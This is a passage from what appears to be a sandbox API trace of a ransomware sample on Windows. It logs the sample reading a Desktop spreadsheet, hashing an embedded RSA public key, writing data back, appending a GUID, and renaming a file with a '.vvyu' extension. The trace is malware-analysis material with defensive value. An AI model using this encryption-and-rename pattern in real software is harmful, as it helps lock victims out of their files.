[0187.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0187.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0187.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2b1ab90 | out: hHeap=0x2c0000) returned 1 [0187.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2b1ada8 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7a8 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0187.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7d8 | out: hHeap=0x2c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05af8 | out: hHeap=0x2c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2b1a980 | out: hHeap=0x2c0000) returned 1 [0187.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0187.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0187.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0187.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0187.891] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x25800, lpOverlapped=0x0) returned 1 [0187.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0187.893] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb8800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.893] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0187.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0187.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0187.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0187.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0187.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0187.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0187.895] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0187.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0187.895] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.895] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0187.895] CloseHandle (hObject=0x584) returned 1 [0187.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x2a246b8 [0187.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x2ae3ea0 [0187.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a246b8 | out: hHeap=0x2c0000) returned 1 [0187.913] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe.vvyu")) returned 1 [0187.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0187.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.916] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0187.920] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x620ef60, ftCreationTime.dwHighDateTime=0x1d89f88, ftLastAccessTime.dwLowDateTime=0x38c8f110, ftLastAccessTime.dwHighDateTime=0x1d8a1c2, ftLastWriteTime.dwLowDateTime=0x38c8f110, ftLastWriteTime.dwHighDateTime=0x1d8a1c2, nFileSizeHigh=0x0, nFileSizeLow=0xe510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0W8tqjZS69QqxVZS-D8D.ods", cAlternateFileName="0W8TQJ~1.ODS")) returned 1 [0187.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05af8 [0187.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0187.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05af8 | out: hHeap=0x2c0000) returned 1 [0187.921] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\0W8tqjZS69QqxVZS-D8D.ods") returned=".ods" [0187.921] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\0W8tqjZS69QqxVZS-D8D.ods" (normalized: "c:\\users\\keecfmwgj\\desktop\\0w8tqjzs69qqxvzs-d8d.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.921] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=58640) returned 1 [0187.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0187.925] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe4ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.925] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0187.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.927] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.928] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xe510, lpOverlapped=0x0) returned 1 [0187.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0187.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.929] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0187.930] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0187.930] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.930] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0187.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0187.930] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0187.930] GetLastError () returned 0x0 [0187.930] SetLastError (dwErrCode=0x0) [0187.930] GetLastError () returned 0x0 [0187.930] SetLastError (dwErrCode=0x0) [0187.930] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.931] GetLastError () returned 0x0 [0187.931] SetLastError (dwErrCode=0x0) [0187.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.932] SetLastError (dwErrCode=0x0) [0187.932] GetLastError () returned 0x0 [0187.933] SetLastError (dwErrCode=0x0) [0187.933] GetLastError () returned 0x0 [0187.933] SetLastError (dwErrCode=0x0) [0187.933] GetLastError () returned 0x0 [0187.933] SetLastError (dwErrCode=0x0) [0187.933] GetLastError () returned 0x0 [0187.933] SetLastError (dwErrCode=0x0) [0187.933] GetLastError () returned 0x0 [0187.933] SetLastError (dwErrCode=0x0) [0187.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0187.933] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0187.933] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0187.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0187.934] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0187.934] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0187.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0187.934] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0187.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe510) returned 0x2ae3ea0 [0187.935] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05af8 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7d8 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae21d0 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7a8 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d808 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d778 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0187.935] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2af23b8 [0187.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af25d8 [0187.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0187.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0187.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0187.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af25d8 | out: hHeap=0x2c0000) returned 1 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d778 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d808 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0187.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0187.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0187.937] GetCurrentThreadId () returned 0x5d8 [0187.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2edde0 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.938] GetCurrentThreadId () returned 0x5d8 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0187.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0187.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0187.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0187.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0187.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0187.940] 